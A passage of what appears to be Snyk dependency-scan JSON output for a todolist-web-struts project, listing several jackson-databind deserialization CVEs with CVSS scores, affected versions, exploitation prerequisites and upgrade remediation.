`jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.3, 2.7.9.5, 2.8.11.3, 2.9.7 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/87d29af25e82a249ea15858e2d4ecbf64091db44)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2097)\n", + "epssDetails": { + "percentile": "0.84205", + "probability": "0.01052", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2018-14720" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-x2w5-5m2g-7h5m" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2018-10-11T17:21:22.141403Z", + "functions_new": [ + { + "version": [ + "[,2.9.7)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2018-07-27T17:20:17Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2018-10-11T17:19:17Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:48:33.930153Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5", + "severityWithCritical": "high" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-72450", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,2.6.7.3)", + "[2.7.0,2.7.9.5)", + "[2.8.0,2.8.11.3)", + "[2.9.0,2.9.7)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "2.6.7.3", + "2.7.9.5", + "2.8.11.3", + "2.9.7" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.9.7)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/87d29af25e82a249ea15858e2d4ecbf64091db44", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2097", + "title": "GitHub Issue" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/blob/a066415d66a6b1a4688ff0ed25695aa3a86ac130/release-notes/VERSION-2.x", + "title": "GitHub Release Notes" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:47:48.151247Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:51:21.823657Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:55:39.120318Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:47:48.151247Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:51:21.823657Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. An attacker could perform a Remote Code Execution attack via the `blaze-ds-opt` gadget due to an incomplete fix for the [CVE-2017-7525](https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-31507) deserialization flaw.\r\n\r\n**Note:** This vulnerability (`CVE-2018-14719`) is not identical to `CVE-2018-12018`, `CVE-2018-14720`, `CVE-2018-14721`, `CVE-2018-14722`,`CVE-2018-12023` and `CVE-2018-11307`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.3, 2.7.9.5, 2.8.11.3, 2.9.7 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/87d29af25e82a249ea15858e2d4ecbf64091db44)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2097)\n- [GitHub Release Notes](https://github.com/FasterXML/jackson-databind/blob/a066415d66a6b1a4688ff0ed25695aa3a86ac130/release-notes/VERSION-2.x)\n", + "epssDetails": { + "percentile": "0.85805", + "probability": "0.01269", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2018-14719" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-4gq5-ch57-c2mg" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2018-10-11T17:23:45.326350Z", + "functions_new": [ + { + "version": [ + "[,2.9.7)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2018-07-27T17:22:45Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2018-10-11T17:22:38Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:51:21.823657Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5", + "severityWithCritical": "high" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-72451", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,2.6.7.3)", + "[2.7.0,2.7.9.5)", + "[2.8.0,2.8.11.3)", + "[2.9.0,2.9.7)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "2.6.7.3", + "2.7.9.5", + "2.8.11.3", + "2.9.7" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.9.7)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/87d29af25e82a249ea15858e2d4ecbf64091db44", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2097", + "title": "GitHub Issue" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", + "cvssV3BaseScore": 10, + "modificationTime": "2024-03-11T09:46:43.143163Z" + }, + { + "assigner": "Red Hat", + "severity": "medium", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:N/A:N", + "cvssV3BaseScore": 6.8, + "modificationTime": "2024-03-11T09:51:21.774444Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:57:20.565013Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 10, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:46:43.143163Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:N/A:N", + "assigner": "Red Hat", + "severity": "medium", + "baseScore": 6.8, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:51:21.774444Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. A malicious user could perform a SSRF attack via the `axis2-jaxws` gadget due to an incomplete fix for the [CVE-2017-7525](https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-31507) deserialization flaw.\r\n\r\n**Note:** This vulnerability (`CVE-2018-14721`) is not identical to `CVE-2018-12018`, `CVE-2018-14719`, `CVE-2018-14720`, `CVE-2018-14722`,`CVE-2018-12023` and `CVE-2018-11307`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.3, 2.7.9.5, 2.8.11.3, 2.9.7 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/87d29af25e82a249ea15858e2d4ecbf64091db44)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2097)\n", + "epssDetails": { + "percentile": "0.85710", + "probability": "0.01257", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2018-14721" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-9mxf-g3x6-wv74" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2018-10-11T17:25:40.161831Z", + "functions_new": [ + { + "version": [ + "[,2.9.7)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2018-07-27T17:24:46Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2018-10-11T17:24:39Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:51:21.774444Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5", + "severityWithCritical": "high" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-72882", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "credit": [ + "Wuguixiong" + ], + "semver": { + "vulnerable": [ + "[,2.6.7.3)", + "[2.7.0,2.7.9.5)", + "[2.8.0,2.8.11.3)", + "[2.9.0,2.9.8)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "2.6.7.3", + "2.7.9.5", + "2.8.11.3", + "2.9.8" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[2.0.0, 2.9.8)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/42912cac4753f3f718ece875e4d486f8264c2f2b", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2186", + "title": "GitHub Issue" + }, + { + "url": "https://github.com/FasterXML/jackson/wiki/Jackson-Release-2.9.8", + "title": "GitHub Release Tag" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:48:06.100058Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", + "cvssV3BaseScore": 7.3, + "modificationTime": "2024-03-11T09:51:22.043196Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:58:46.690019Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:48:06.100058Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 7.3, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:51:22.043196Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. An attacker could perform a Remote Code Execution attacks due to not blocking the `jboss-common-core ` class from polymorphic deserialization.\r\n\r\n**Note** This vulnerability (`CVE-2018-19362`) is not identical to `CVE-2018-19360` and `CVE-2018-19361`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.3, 2.7.9.5, 2.8.11.3, 2.9.8 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/42912cac4753f3f718ece875e4d486f8264c2f2b)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2186)\n- [GitHub Release Tag](https://github.com/FasterXML/jackson/wiki/Jackson-Release-2.9.8)\n", + "epssDetails": { + "percentile": "0.81590", + "probability": "0.00788", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2018-19362" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-c8hm-7hpq-7jhg" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2019-01-03T14:17:19.256477Z", + "functions_new": [ + { + "version": [ + "[2.0.0, 2.9.8)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2019-01-02T19:18:44Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2019-01-03T17:01:51Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:51:22.043196Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5", + "severityWithCritical": "high" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-72883", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "credit": [ + "Wuguixiong" + ], + "semver": { + "vulnerable": [ + "[,2.6.7.3)", + "[2.7.0,2.7.9.5)", + "[2.8.0,2.8.11.3)", + "[2.9.0,2.9.8)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "2.6.7.3", + "2.7.9.5", + "2.8.11.3", + "2.9.8" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[2.0.0, 2.9.8)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/42912cac4753f3f718ece875e4d486f8264c2f2b", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2186", + "title": "GitHub Issue" + }, + { + "url": "https://github.com/FasterXML/jackson/wiki/Jackson-Release-2.9.8", + "title": "GitHub Release Tag" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:48:04.422288Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", + "cvssV3BaseScore": 7.3, + "modificationTime": "2024-03-11T09:48:34.457712Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:57:20.593938Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:48:04.422288Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 7.3, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:48:34.457712Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. An attacker could perform a Remote Code Execution attacks due to not blocking the `axis2-transport-jms ` class from polymorphic deserialization.\r\n\r\n**Note** This vulnerability (`CVE-2018-19360`) is not identical to `CVE-2018-19362` and `CVE-2018-19361`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - 